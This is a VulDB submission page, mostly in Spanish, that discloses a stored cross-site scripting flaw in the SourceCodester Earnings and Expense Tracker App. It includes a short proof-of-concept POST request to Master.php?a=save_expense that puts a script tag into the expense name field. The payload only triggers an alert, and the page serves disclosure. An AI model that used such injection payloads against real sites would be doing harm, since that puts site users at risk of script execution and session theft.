Enviar #106924: Earnings and Expense Tracker App Stored XSS Vulnerability información

TítuloEarnings and Expense Tracker App Stored XSS Vulnerability
DescripciónEarnings and Expense Tracker App has a Stored XSS Vulnerability at its Add New Expense function, attackers can add a new expense with a malicous name , which will trigger XSS. POC below: POST /php-sqlite-expense-tracker/Master.php?a=save_expense HTTP/1.1 ************************************************ formToken=%242y%2410%24Y9eGQHr93I.RCJ%2Fqynf7rO2avKfaTpEzdoliNgYgMrQlwBuDuUGOG&expense_id=&name=%3Cscript%3Ealert('haha')%3C%2Fscript%3E&amount=10
Fuente⚠️ https://www.sourcecodester.com/php/16354/earnings-and-expense-tracker-app-using-php-and-sqlite3-source-code-free-download.html
Usuario
 WWesleywww (UID 43117)
Sumisión2023-03-28 14:14 (hace 3 años)
Moderación2023-03-28 23:07 (9 hours later)
EstadoAceptado
Entrada de VulDB224307 [SourceCodester Earnings and Expense Tracker App 1.0 Master.php?a=save_expense Nombre secuencias de comandos en sitios cruzados]
Puntos20

AnteriorVisión De ConjuntoPróximo

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!